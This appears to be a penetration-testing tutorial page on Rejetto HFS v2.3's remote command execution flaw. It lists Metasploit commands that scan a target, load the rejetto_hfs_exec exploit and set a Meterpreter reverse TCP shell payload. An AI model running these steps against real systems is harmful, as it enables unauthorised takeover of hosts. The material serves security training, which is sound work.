HTTP File Server (HFS)

An HTTP File Server (HFS) is a web server used for sharing files and documents. It usually runs on TCP port 80 and uses the HTTP protocol for communication. Rejetto HFS is a well-known, free, and open-source HTTP file server that works on both Windows and Linux.

Rejetto HFS v2.3 has a vulnerability that allows a remote command execution attack. This means an attacker can use this flaw to run commands on the target system. Metasploit (MSF) has an exploit module that can be used to take control of the system hosting the vulnerable HFS.

msfconsole -q
workspace -a HFS
setg RHOSTS [IP]
db_nmap -sS -sV -O [IP]

search type:exploit name:rejetto
use exploit/windows/http/rejetto_hfs_exec
set payload windows/x64/meterpreter/reverse_tcp

PreviousSMB NextApache Tomcat Web Server

Last updated 11 months ago